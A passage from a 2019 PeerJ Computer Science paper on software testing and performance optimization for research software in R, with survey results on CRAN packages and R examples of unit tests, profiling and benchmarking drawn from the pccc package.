automatically detecting the use of software testing techniques and tools. The best evidence of software optimization would be in the history of commits, unit tests that time functionality, and package bug reports. While all R packages have source code available, not all have development history available nor unit tests available. Additionally, a stated dependency on one of the optimization packages listed could mean the package creators recommend using that along with their package, not that they are actually using it in their package. Despite these shortcomings, it is estimated that presence of a src directory or the use of specific packages is an indication that some optimization effort was put into a package. As shown in Fig. 3, the evaluation for the presence of a non-empty src directory shows that there is an increasing trend in using compiled code in R packages, by count. However, when evaluated as a percent of all R packages, the change has only been a slight increase over the last few years. Table S3 contains the data used to generate Fig. 3. As shown in Fig. 4, in 2018, Rcpp is the most common optimization related dependency followed by parallel and foreach. Those same packages have been the most popular for packages last updated during the entire period shown. There 699 packages that list Figure 3 Packages with non-empty src directory. Count of packages with files in standard source directories that has code to be compiled by year a package was last updated. Compiled directory “Yes” is determined by the presence of files matching the regular expression “src[̂/]�/.+”; if no matches are found for an R package, it is counted as a “No”. Full-size DOI: 10.7717/peerj-cs.175/fig-3 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 6/26 http://dx.doi.org/10.7717/peerj-cs.175/supp-3 http://dx.doi.org/10.7717/peerj-cs.175/fig-3 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ dependencies to more than one optimization framework (407 with 2 dependencies, 220 w/3, 53 w/4, 16 w/5, 2 w/6, 1 w/7), so the total number of packages shown in the histogram includes some that are double-counted. Table S4 contains the data used to generate Fig. 4. As the numbers from Metric 1 do not match the numbers of Metric 2, some additional exploration is necessary. In terms of total difference, there are 818 more packages using compiled code vs those with one of the searched for dependencies. There are 1,726 packages that do not list a dependency to one of the specified packages, but have a src directory for compiled code. There are 908 packages that list a dependency to one of the specified packages but do not have a src directory. See Tables S3 and S4 for more details. RECOMMENDATIONS TO IMPROVE QUALITY AND PERFORMANCE Software testing Whenever software is written as part of a research project, careful consideration should be given to how to verify that the software performs the desired functionality and produces the desired output. As with bench science, software can often have unexpected and unintended results due to minor or even major problems during the implementation process. Software testing is a well-established component of any software development lifecycle (Atchison et al., 1968) and should also be a key component of research software. As shown previously, even among R software packages intended to be shared Figure 4 Packages with optimization framework dependency. Count of dependencies on an optimi- zation related package, see “Optimization of R packages” section for complete list, by year a package was last updated. Packages with no stated dependency from their DESCRIPTION file for one of the specified packages are listed as “none.” In order to aid visual understanding of top dependencies, we limited display to those packages that had 14 or more dependent packages.Full-size DOI: 10.7717/peerj-cs.175/fig-4 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 7/26 http://dx.doi.org/10.7717/peerj-cs.175/supp-4 http://dx.doi.org/10.7717/peerj-cs.175/supp-3 http://dx.doi.org/10.7717/peerj-cs.175/supp-4 http://dx.doi.org/10.7717/peerj-cs.175/fig-4 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ with and used by others, the majority of R packages (67–73% depending on metric) do not have tests that are made available with the package. Various methodologies and strategies exist for software testing and validation as well as how to integrate software with a software development lifecycle. Some common testing strategies are no strategy, ad hoc testing (Agruss & Johnson, 2000), test driven development (TDD) (Beck & Gamma, 1998). There are also common project methodologies where testing fits into the project lifecycle; two common examples are the waterfall project management methodology, where testing is a major phase that occurs at a specific point in time, and the agile project management methodology (Beck et al., 2001), where there are many small iterations including testing. While a full discussion of various methods and strategies is beyond the scope of this article, three key concepts presented are: when to start testing, what to test, and how to test. Key recommendations for when to test: � Build tests before implementation. � Test after functionality has been implemented. Discussion: One of the popular movements in recent years has been to develop tests first and then implement code to meet desired functionality, a strategy called TDD. While the TDD strategy has done much to improve the focus of the software engineering world on testing, some have found that it does not work with all development styles (Hansson, 2014; Sommerville, 2016), and others have reported that it does not increase developer productivity, reduce overall testing effort, nor improve code quality in comparison to other testing methodologies (Fucci et al., 2016). An approach that more closely matches the theoretically based software development cycle and flexible nature of research software is to create tests after a requirement or feature has been implemented (Osborne et al., 2014; Kanewala & Bieman, 2014). As developing comprehensive tests of software functionality can be a large burden to accrue at a single point in time, a more pragmatic approach is to alternate between developing new functionality and designing tests to validate new functionality. Similar to the agile software development strategy, a build/test cycle can allow for quick cycles of validated functionality that help to provide input into additional phases of the software lifecycle. Key recommendations for what to test: � Identify the most important or unique feature(s) of software being implemented. Software bugs are found to follow a Pareto or Zipfian distribution. � Test data and software configuration. � If performance is a key feature, build tests to evaluate performance. Discussion: In an ideal world, any software developed would be accompanied by 100% test coverage validating all lines of code, all aspects of functionality, all input, and all interaction with other software. However, due to pressures of research, having time to build a perfect test suite is not realistic. A parsimonious application of the Pareto principle Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 8/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ will go a long way towards improving overall software quality without adding to the testing burden. Large companies such as Microsoft have applied traditional scientific methods to the study of bugs and found that the Pareto principle matches reality: 20% of bugs cause 80% of problems; additionally a Zipfian distribution may apply as well: 1% of bugs cause 50% of all problems (Rooney, 2002). To apply the Pareto principle to testing, spend some time in a thought experiment to determine answers to questions such as: What is the most important feature(s) of this software? If this software breaks, what is the most likely bad outcome? For computationally intensive components—how long should this take to run? Once answers to these questions are known, the developer(s) should spend time designing tests to validate key features, avoiding major negatives, and ensuring software performs adequately. Optimization and performance recommendations are covered in the “Software Optimization” section. Part of the test design process should include how to “test” more than just the code. Some specific aspects of non-code tests include validation of approach and implementation choices with a mentor or colleague. As a brief example of how to apply the aforementioned testing principles, we provide some information on testing steps followed during the pccc package development process. The first tests written were those that were manually developed and manually run as development progressed. Key test cases of this form are ideal candidates for inclusion in automated testing. The first tests were taking a known data set, running our process to identify how many of the input rows had complex chronic conditions, and then report on the total percentages found; this result was then compared with published values. # read in HCUP KID 2009 Database kid9cols <- read_csv(“KID09_core_columns.csv”) kid9core <- read_fwf(“KID_2009_Core.ASC”, fwf_positions( start = kid9cols$start, end = kid9cols$end, col_names = tolower(kid9cols$name)), col_types = paste(rep(“c”, nrow(kid9cols)), collapse = “”)) # Output some summary information for manual inspection table(kid9core$year) dim(kid9core) n_distinct(kid9core$recnum) # Run process to identify complex chronic conditions kid_ccc <- ccc(kid9core[, c(2, 24:48, 74:77, 106:120)], id = recnum, dx_cols = vars(starts_with(“dx”), starts_with(“ecode”)), Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 9/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ pc_cols = vars(starts_with(“pr”)), icdv = 09) # Output results for manual inspection kid_ccc # Create summary statistics to compare to published values dplyr::summarize_at(kid_ccc, vars(-recnum), sum) %>% print.data.frame dplyr::summarize_at(kid_ccc, vars(-recnum), mean) %>% print.data.frame For the pccc package there is a large set of ICD codes and code set patterns that are used to determine if an input record meets any complex chronic condition criteria. To validate the correct functioning of the software, we needed to validate the ICD code groupings were correct and were mutually exclusive (as appropriate). As pccc is a re-implementation of existing SAS and Stata code, we needed to validate that the codes from the previously developed and published software applications were identical and were performing as expected. Through a combination of manual review and automated comparison codes were checked to see if duplicates and overlaps existed. Any software dealing with input validation or having a large amount of built-in values used for key functionality should follow a similar data validation process. As an example of configuration testing, here is a brief snippet of some of the code used to automatically find duplicates and codes that were already included as part of another code: icds <- input.file(“../pccc_validation/icd10_codes_r.txt”) unlist(lapply(icds, function(i) { tmp <- icds[icds != i] output <- tmp[grepl(paste0(“̂”, i, “.�”), tmp)] # add the matched element into the output if(length(output) != 0) output <- c(i, output) output })) Key recommendations for how to test: � Software developer develops unit tests. � Intended user of software should perform validation/acceptance tests. � Run all tests regularly. � Review key algorithms with domain experts. Discussion: Most programming languages have a multitude of testing tools and frameworks available for assisting developers with the process of testing software. Due to the recurring patterns common across programming languages most languages have a Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 10/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ SUnit (Wikipedia contributors, 2017a) derived testing tool, commonly referred to as an “xUnit” (Wikipedia contributors, 2017b) testing framework that focuses on validating individual units of code along with necessary input and output meet desired requirements. Based on software language used, unit tests may be at the class or function/procedure level. Some common xUnit style packages in R are RUnit and testthat. Unit tests should be automated and run regularly to ensure errors are caught and addressed quickly. For R, it is easy to integrate unit tests into the package build process, but other approaches such as post-commit hook in a version control system are also common. In addition to unit tests, typically written by the developers of the software, users should perform acceptance tests, or high-level functionality tests that validate the software meets requirements. Due to the high-level nature and subjective focus of acceptance tests, they are often manually performed and may not follow a regimented series of steps. Careful documentation of how a user will actually use software, referred to as user stories, are translated into step by step tests that a human follows to validate the software works as expected. A few examples of acceptance testing tools that primarily focus GUI aspects of software are: Selenium (Selenium Contributors, 2018), Microfocus Unified Functional Testing (formely known as HP’s QuickTest Professional) (Micro Focus, 2018), and Ranorex (Ranorex GmbH, 2018). As research focused software often does not have a GUI, one aide to manual testing processes is for developers of the software or expert users to create a full step by step example via an R Markdown (Allaire et al., 2018b; Xie, Allaire & Grolemund, 2018) notebook demonstrating use of the software followed by either manually or automatic validation that the expected end result is correct. In addition to the tool-based approaches already mentioned, other harder to test items such as algorithms and solution approach should be scrutinized as well. While automated tests can validate mathematical operations or other logic steps are correct, they cannot verify that the approach or assumptions implied through software operations are correct. This level of testing can be done through code review and design review sessions with others who have knowledge of the domain or a related domain. During development of the pccc package, after the initial tests shown in previous sections, further thought went into how the specifics of the desired functionality should perform. Unit tests were developed to validate core functionality. We also spent time thinking about how the software might behave if the input data was incorrect or if parameters were not specified correctly. If an issue is discovered at this point, a common pattern is to create a test case for discovered bugs that are fixed—this ensures that a re-occurrence, known as a “regression” to software engineers, of this error does not happen again. In the case of pccc, developers expected large input comprised of many observations with many variables. When a tester accidentally just passed 1 observation with many variables, the program crashed. The problem was discovered to be due to the flexible nature of the sapply() function returning different data types based on input. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 11/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ The original code from ccc.R: # check if call didn’t specify specific diagnosis columns if (!missing(dx_cols)) { # assume columns are referenced by ‘dx_cols’ dxmat <- sapply(dplyr::select( data, !!dplyr::enquo(dx_cols)), as.character) # create empty matrix if necessary if(! is.matrix(dxmat)) { dxmat <- as.matrix(dxmat) } } else { dxmat <- matrix(“”, nrow = nrow(data)) } The new code: if (!missing(dx_cols)) { dxmat <- as.matrix(dplyr::mutate_all( dplyr::select( data, !!dplyr::enquo(dx_cols)), as.character)) } else { dxmat <- matrix(“”, nrow = nrow(data)) } One of the tests written to verify the problem didn’t reoccur: # Due to previous use of sapply in ccc.R, this would fail test_that(paste(“1 patient with multiple rows of no diagnosis”, “data--should have all CCCs as FALSE”), { expect_true(all(ccc(dplyr::data_frame( id = ‘a’, dx1 = NA, dx2 = NA), dx_cols = dplyr::starts_with(“dx”), icdv = code) == 0)) } ) Testing Anti-Patterns: While the above guidance should help researchers know the basics of testing, it does not cover in detail what not to do. An excellent collection of testing anti-patterns can be found at (Moilanen, 2014; Carr, 2015; Stack Overflow Contributors, 2017). Some key problems that novices experience when learning how to test software are: � Interdependent tests—Interdependent tests can cause multiple test failures. When a failure in an early test case breaks a later test, it can cause difficulty in resolution and remediation. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 12/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ � Testing application performance—While testing execution timing or software performance is a good idea and is covered more in the “Software Optimization” section, creating an automated test to perform this is difficult and does not carry over well from one machine to another. � Slow running tests—As much as possible, tests should be automated but still run quickly. If the testing process takes too long consider refactoring tests or evaluating the performance of the software being tested. � Only test correct input—A common problem in testing is to only validate expected inputs and desired behavior. Make sure tests cover invalid input, exceptions, and similar items. Software optimization Getting software to run in a reasonable amount of time is always a key consideration when working with large datasets. A mathematical understanding of software algorithms is usually a key component of software engineering curricula, but not widely covered in other disciplines. Additionally, while software engineering texts and curricula highlight the importance of testing for non-functional requirements such as performance (Sommerville, 2015), they often fail to provide details on how best to evaluate software performance or how to plan for performance during the various phases of software lifecycle. The survey of R packages at the beginning of this work indicates that approximately 75% of packages do not use optimization related packages nor compiled code to improve performance. While the survey of R packages is not evidence of non-optimization of packages in CRAN, computational researchers can should carefully consider performance aspects of their software before declaring it complete. This section will provide a starting point for additional study, research, and experimentation. The Python Foundation’s Python language wiki provides excellent high-level advice (Python Wiki Contributors, 2018) to follow before spending too much time in optimization: First get the software working correctly, test to see if it is correct, profile the application if it is slow, and lastly optimize based on the results of code profiling. If necessary, repeat multiple cycles of testing, profiling, and optimization phases. The key aspects of software optimization discussed in this are: identify a performance target, understanding and applying Big O notation, and the use code profiling and benchmarking tools. Key recommendations for identifying and validating performance targets: � Identify functional and non-functional requirements of the software being developed. � If software performance is key to the software requirements, develop repeatable tests to evaluate performance. Discussion: The first step to software optimization is to understand the functional and non-functional requirements of the software being built. Based on expected input, output, and platform the software will be run on, one can make a decision as to what is good enough for the software being developed. A pragmatic approach is best—do not Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 13/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ spend time optimizing if it does not add value. Once the functional requirements have been correctly implemented and validated, a decision point is reached: decide if the software is slow and in need of evaluation and optimization. While this may seem a trivial and unnecessary step, it should not be overlooked; a careful evaluation of costs versus benefit from an optimization effort should be evaluated before moving forward. Some methods for gathering the performance target are through an evaluation of other similar software, interdependencies of the software and its interaction with other systems, and discussion with other experts in the field. Once a performance target has been identified, development of tests for performance can begin. While performance testing is often considered an anti-pattern of testing (Moilanen, 2014) some repeatable tests should be created to track performance as development progresses. Often a “stress test” or a test with greater than expected input/usage is the best way to do this. A good target is to check an order of magnitude larger input than expected. This type of testing can provide valuable insight into the performance characteristics of the software as well unearth potentials for failure due to unexpected load (Sommerville, 2015). Here is an example of performance validation testing that can also serve as a basic reproducibility test calling the main function from pccc using the microbenchmark package (one could also use bench, benchr, or other similar R packages). library(pccc) rm(list=ls()) gc() icd10_large <- feather::read_feather( “../icd_file_generator/icd10_sample_large.feather” ) library(microbenchmark) microbenchmark( ccc(icd10_large[1:10000, c(1:45)], # get id, dx, and pc columns id = id, dx_cols = dplyr::starts_with(“dx”), pc_cols = dplyr::starts_with(“pc”), icdv = 10), times = 10) Unit: seconds expr min lq mean median uq max neval ccc 2.857625 2.908964 2.959805 2.920408 3.023602 3.119937 10 Results are from a system with 3.1 GHz Intel Core i7, 16 GB 2133 MHz LPDDR3, PCI-Express SSD, running macOS 10.12.6 and R version 3.5.1 (2018-07-02). Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 14/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ As software runs can differ significantly from one to the next due to other software running on the test system, a good starting point is to run the same test 10 times (rather than the microbenchmark default of 100 due to this being a longer running process) and record the mean run time. microbenchmark also shows median, lower and upper quartiles, min, and max run times. The actual ccc() call specifics are un-important; the key is to test the main features of your software in a repeatable fashion and watch for performance changes over time. These metrics can help to identify if a test was valid and indicate a need for retesting; that is, a large interquartile range may indicate not enough tests were run or some aspect of environment is causing performance variations. Software benchmarking is highly system specific in that changing OS version, R version, R dependent package version, compiler version (if compiled code involved), or hardware may change the results. As long as all tests are run the same on the same system with the same software, one can compare timings as development progresses. Lastly, although the example above is focused on runtime, it can be beneficial to also identify targets for disk space used and memory required to complete all desired tasks. As an example, tools such as bench and profvis demonstrated in our “Code Profiling/Benchmarking” section as well as object.size() from core R can give developers insight into memory allocation and usage. There are many resources beyond this work that can provide guidance on how to minimize RAM and disk resources (Kane, Emerson & Weston, 2013; Wickham, 2014b; Wickham et al., 2016; Klik, Collet & Facebook, 2018). Key recommendations for identifying upper bound on performance: � Big O notation allows the comparison of theoretical performance of different algorithms. � Evaluate how many times blocks of code will run as input approaches infinity. � Loops inside loops are very slow as input approaches infinity. Discussion: Big O notation is a method for mathematically determining the upper bound on performance of a block of code without consideration for language and hardware specifics. Although performance can be evaluated in terms of storage or run time, most examples and comparisons focus on run time. However, when working with large datasets, memory usage and disk usage can be of equal or higher importance than run. Big O notation is reported in terms of input (usually denoted as n) and allows one to quickly compare theoretical performance of different algorithms. The basic steps for evaluating the upper bound of performance of a block of software code is to evaluate what code will run as n approaches infinity. Items that are constant time (regardless of if they run once or x times independent of input) are reduced down to O(1). The key factors that contribute to Big O are loops—a single for loop or similar construct through recursion that runs once for all n is O(n); a nested for loop would be O(n2). When calculating Big O for a code block, function, or software system, lower order terms are ignored, and just the largest Big O notation is used; for example, if a code block is O(1) + O(n) + O(n3) it would be denoted as O(n3). Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 15/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Despite the value of understanding the theoretical upper bound of software in an ideal situation, there are many difficulties that arise during implementation that can make Big O difficult to calculate and which could make a large Big O faster than a small Big O under actual input conditions. Some key takeaways to temper a mathematical evaluation of Big O are: � Constants matter when choosing an algorithm—for example, if one algorithm is O(56n2), there exists some n where O(n3) is faster. � Average or best case run time might be more relevant. � Big O evaluation of algorithms in high level languages is often hard to quantify. For additional details on Big O notation, see the excellent and broadly understandable introduction to Big O notation (Abrahms, 2016). Key recommendations for profiling and benchmarking: � Profile code to find bottlenecks. � Modify code to address largest items from profiling. � Run tests to make sure functionality isn’t affected. � Repeat process if gains are made and additional performance improvements are necessary. Discussion: As discussed throughout this section, optimization is a key aspect of software development, especially with respect to large datasets. Although identification of performance targets and a mathematical analysis of algorithms are important steps, the final result must be tested and verified. The only way to know if your software will perform adequately under ideal (and non-ideal) circumstances is to use benchmarking and code profiling tools. Code profilers show how a software behaves and what functions are being called while benchmarking tools generally focus on just execution time—though some tools combine both profiling and benchmarking. In R, some of the common tools are bench, benchr, microbenchmark, tictoc, Rprof (R Core Team, 2018), proftools (Tierney & Jarjour, 2016), and profvis. If, after implementation has been completed, the software functions correctly, and performance targets have not been met, look to optimize your code. Follow an iterative process of profiling to find bottlenecks, making software adjustments, testing small sections with benchmarking and then repeating the process with overall profiling again. If at any point in the process you discover that due to input size, functional requirements, hardware limitations, or software dependencies you cannot make a significant impact to performance, consider stopping further optimization efforts (Burns, 2012). As with software testing and software bugs, the Pareto principle applies, though some put the balance between code and execution time is closer to 90% of time is in 10% of the code or even as high as 99% in 1% (Xochellis, 2010; Bird, 2013). Identify the biggest bottlenecks via code profiling and focus only on the top issues first. As an example of how to perform code profiling and benchmarking in R, do the following: Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 16/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ First, use profvis to identify the location with the largest execution time: library(pccc) icd10_large <- feather::read_feather(“icd10_sample_large.feather”) profvis::profvis({ccc(icd10_large[1:10000,], id = id, dx_cols = dplyr::starts_with(“dx”), pc_cols = dplyr::starts_with(“pc”), icdv = 10)}, torture = 100) In Fig. 5 you can see a visual depiction of memory allocation, known as a “Flame Graph,” as well as execution time and call stack. By clicking on each item in the stack you will be taken directly to the relevant source code and can see which portions of the code take the most time or memory allocations. Figure 6 is a depiction of the data view which shows just the memory changes, execution time, and source file. Once the bottleneck has been identified, if possible extract that code to a single function or line that can be run repeatedly with a library such as microbenchmark or tictoc to see if a small change either improves or degrades performance. Test frequently and make sure to compare against previous versions. You may find that something you thought would improve performance degrades performance. As a first step we recommend running tictoc to get general timings such as the following: library(tictoc) tic(“timing: r version”) out <- dplyr::bind_cols(ids, ccc_mat_r(dxmat, pcmat, icdv)) toc() Figure 5 Profvis flame graph. Visual depiction of memory allocation/deallocation, execution time, and call stack. Full-size DOI: 10.7717/peerj-cs.175/fig-5 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 17/26 http://dx.doi.org/10.7717/peerj-cs.175/fig-5 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ tic(“timing: c++ version”) dplyr::bind_cols(ids, ccc_mat_rcpp(dxmat, pcmat, icdv)) toc() timing: r version: 37.089 sec elapsed timing: c++ version: 5.087 sec elapsed As with previous timings, while we’re showing pccc calls, any custom function of block of code you have can be compared against an alternative version to see which performs better. The above blocks of code call the core functionality of the pccc package—one implemented all in R, the other with C++ for the matrix processing and string matching components; see sourcecode available at https://github.com/magic-lantern/pccc/ blob/no_cpp/R/ccc.R for full listing. After starting with high level timings, next run benchmarks on specific sections of code such as in this example comparing importing a package vs using the package reference operator using bench: library(bench) set.seed(42) bench::mark( package_ref <- lapply(medium_input, function(i) { if(any(stringi::stri_startswith_fixed(i, ‘S’),na.rm = TRUE)) return(1L) else return(0L) })) # A tibble: 1 � 14 expression min mean median max �itr/sec� mem_alloc <chr> <bch> <bch> <bch:> <bch> <dbl> <bch:byt> 1 package_r : : : 547ms 547ms 547ms 547ms 1.83 17.9MB library(stringi) bench::mark( direct_ref <- lapply(medium_input, function(i) { if(any(stri_startswith_fixed(i, ‘S’),na.rm = TRUE)) return(1L) else return(0L) })) # A tibble: 1 � 14 expression min mean median max �itr/sec� mem_alloc <chr> <bch> <bch> <bch:> <bch> <dbl> <bch:byt> 1 direct_re : : : 271ms 274ms 274ms 277ms 3.65 17.9MB The above test was run on a virtual machine running Ubuntu 16.04.5 LTS using R 3.4.4. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 18/26 https://github.com/magic-lantern/pccc/blob/no_cpp/R/ccc.R https://github.com/magic-lantern/pccc/blob/no_cpp/R/ccc.R http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ One benefit of bench::mark over microbenchmark is that bench reports memory allocations as well as timings, similar to data shown in profvis. Through benchmarking we found that for some systems/configurations the use of the “::” operator, as opposed to importing a package, worsened performance noticeably. Also widely known (Gillespie & Lovelace, 2017) and found to be applicable here is that the use of matrices are preferred for performance reasons over data.frames or tibbles. Matrices do have different functionality, which can require some re-work when converting from one to another. For example, a matrix can only contain 1 data type such as character or numeric; Figure 6 Profvis data chart. Table view of memory allocation/deallocation, execution time, and call stack. Full-size DOI: 10.7717/peerj-cs.175/fig-6 Figure 7 Profvis flame graph .Call(). Visual depiction of memory allocation/deallocation, execution time, and call stack; note the limitations in detail at the .Call() function where custom compiled code is called. Full-size DOI: 10.7717/peerj-cs.175/fig-7 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 19/26 http://dx.doi.org/10.7717/peerj-cs.175/fig-6 http://dx.doi.org/10.7717/peerj-cs.175/fig-7 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ data.frames and tibbles support shortcut notations such as mydf$colname. Another key point found is that an “env” with no parent environment is significantly faster (up to 50x) than one with a parent env. In the end, optimization efforts resulted in reducing run time by 80%. One limitation with R profiling tools is that if the code to be profiled executes C++ code, you will get no visibility into what is happening once the switch from R to C++ has occurred. As shown in Fig. 7, visibility into timing and memory allocation stops at the . Call() function. In order to profile C++ code, you need to use non-R specific tools such as XCode on macOS or gprof on non-macOS Unix-based operating system (OS). See “R_with_C++_profiling.md” in our source code repository for some guidance on this topic. Some general lessons learned from profiling and benchmarking: � “Beware the dangers of premature optimization of your code. Your first duty is to create clear, correct code.” (Knuth, 1974; Burns, 2012) Never optimize before you actually know what is taking all the time/memory/space with your software. Different compilers and core language updates often will change or reverse what experience has previously indicated as sources of slowness. Always benchmark and profile before making a change. � Start development with a high-level programming language first—Developer/ Researcher time is more valuable than CPU/GPU time. Choose the language that allows the developer/researcher to rapidly implement the desired functionality rather than selecting a language/framework based on artificial benchmarks (Kelleher & Pausch, 2005; Jones & Bonsignour, 2011). � Software timing is highly OS, compiler, and system configuration specific. What improves results greatly on one machine and configuration may actually slow performance on another machine. Once you decided to put effort into optimization, make sure you test on a range of realistic configurations before deciding that an “improvement” is beneficial (Hyde, 2009). � If you’ve exhausted your options with your chosen high-level language, C++ is usually the best option for further optimization. For an excellent introduction to combining C++ with R via the library Rcpp, see (Eddelbuettel & Balamuta, 2017). For some additional information on R optimization, see (Wickham, 2014b; Robinson, 2017). CONCLUSION Researchers frequently develop software to automate tasks and speed the pace of research. Unfortunately, researchers are rarely trained in software engineering principles necessary to develop robust, validated, and performant software. Software maintenance is an often overlooked and underestimated aspect in the lifecycle of any software product. Software engineering principles and tooling place special focus on the processes around designing, building, and maintaining software. In this paper, the key topics of software testing and software optimization have been discussed along with some analysis Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 20/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ of existing software packages in the R language. Our analysis showed that the majority of R packages have neither unit testing nor evidence of optimization available with normally distributed source code. Through self-education on unit testing and optimization, any computational or other researcher can pick up the key principles of software engineering that will enable them to spend less time troubleshooting software and more time doing the research they enjoy. ADDITIONAL INFORMATION AND DECLARATIONS Funding The University of Colorado Data Science to Patient Value initiative provided funding for this work. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosure The following grant information was disclosed by the authors: University of Colorado Data Science to Patient Value. Competing Interests The authors declare that they have no competing interests. Author Contributions � Seth Russell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Tellen D. Bennett conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. � Debashis Ghosh conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Source code, images, generated data for R package analysis are available at: https://github.com/magic-lantern/SoftwareEngineeringPrinciples. Materials from paper including figures, references, and text are available at: https://github.com/magic-lantern/SoftwareEngineeringPrinciples/tree/master/paper. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.175#supplemental-information. REFERENCES Abrahms J. 2016. Big-O notation explained by a self-taught programmer. Available at https://justin.abrah.ms/computer-science/big-o-notation-explained.html. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 21/26 https://github.com/magic-lantern/SoftwareEngineeringPrinciples https://github.com/magic-lantern/SoftwareEngineeringPrinciples/tree/master/paper http://dx.doi.org/10.7717/peerj-cs.175#supplemental-information http://dx.doi.org/10.7717/peerj-cs.175#supplemental-information https://justin.abrah.ms/computer-science/big-o-notation-explained.html http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Agruss C, Johnson B. 2000. Ad hoc software testing. Viitattu 4:2009. Allaire JJ, Francois R, Ushey K, Vandenbrouck G, library MG (TinyThread, http://tinythreadpp. bitsnbites.eu/), RStudio, library I (Intel T, https://www.threadingbuildingblocks.org/), Microsoft. 2018a. RcppParallel: parallel programming tools for “Rcpp”. Available at https://CRAN. R-project.org/package=RcppParallel. Allaire JJ, Xie Y, McPherson J, Luraschi J, Ushey K, Atkins A, Wickham H, Cheng J, Chang W, Iannone R. 2018b. rmarkdown: dynamic documents for R. Available at https://rmarkdown. rstudio.com. Apache Software Foundation. 2018. SparkR (R on Spark) - Spark 2.3.2 documentation. Available at https://spark.apache.org/docs/latest/sparkr.html. Atchison WF, Conte SD, Hamblen JW, Hull TE, Keenan TA, Kehl WB, McCluskey EJ, Navarro SO, Rheinboldt WC, Schweppe EJ, Viavant W, Young DM Jr. 1968. Curriculum 68: recommendations for academic programs in computer science: a report of the ACM curriculum committee on computer science. Communications of the ACM 11(3):151–197 DOI 10.1145/362929.362976. Beck K, Beedle M, Van Bennekum A, Cockburn A, Cunningham W, Fowler M, Grenning J, Highsmith J, Hunt A, Jeffries R, Kern J, Marick B, Martin RC, Mellor S, Schwaber K, Sutherland J, Thomas D. 2001. Manifesto for agile software development. Available at http://agilemanifesto.org/. Beck K, Gamma E. 1998. Test infected: programmers love writing tests. Java Report 3:37–50. Available at http://members.pingnet.ch/gamma/junit.htm. Bengtsson H. 2018. future: unified parallel and distributed processing in R for everyone. Available at https://CRAN.R-project.org/package=future. Bengtsson H, R Core Team. 2018. future.apply: apply function to elements in parallel using futures. Available at https://CRAN.R-project.org/package=future.apply. Bird J. 2013. Applying the 80:20 rule in software development - DZone Agile. Available at https://dzone.com/articles/applying-8020-rule-software. Bischl B, Lang M. 2015. parallelMap: unified interface to parallelization back-ends. Available at https://CRAN.R-project.org/package=parallelMap. Bischl B, Lang M, Mersmann O, Rahnenführer J, Weihs C. 2015. BatchJobs and BatchExperiments: abstraction mechanisms for using R in batch environments. Journal of Statistical Software 64:1–25. Burger M, Juenemann K, Koenig T. 2015. RUnit: R unit test framework. Available at https:// CRAN.R-project.org/package=RUnit. Burns P. 2012. The R Inferno. Available at https://lulu.com. Calaway R, Analytics R, Weston S. 2017. doMC: foreach parallel adaptor for “parallel.” Available at https://CRAN.R-project.org/package=doMC. Calaway R, Corporation M, Weston S. 2017. doSNOW: foreach parallel adaptor for the “snow” package. Available at https://CRAN.R-project.org/package=doSNOW. Calaway R, Corporation M, Weston S, Tenenbaum D. 2018. doParallel: foreach parallel adaptor for the “parallel” package. Available at https://CRAN.R-project.org/package=doParallel. Calaway R, Microsoft, Weston S. 2017. foreach: provides foreach looping construct for R. Available at https://CRAN.R-project.org/package=foreach. Carr J. 2015. TDD anti-patterns. Available at https://web.archive.org/web/20150726134212/http:// blog.james-carr.org:80/2006/11/03/tdd-anti-patterns/. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 22/26 https://CRAN.R-project.org/package=RcppParallel https://CRAN.R-project.org/package=RcppParallel https://rmarkdown.rstudio.com https://rmarkdown.rstudio.com https://spark.apache.org/docs/latest/sparkr.html http://dx.doi.org/10.1145/362929.362976 http://agilemanifesto.org/ http://members.pingnet.ch/gamma/junit.htm https://CRAN.R-project.org/package=future 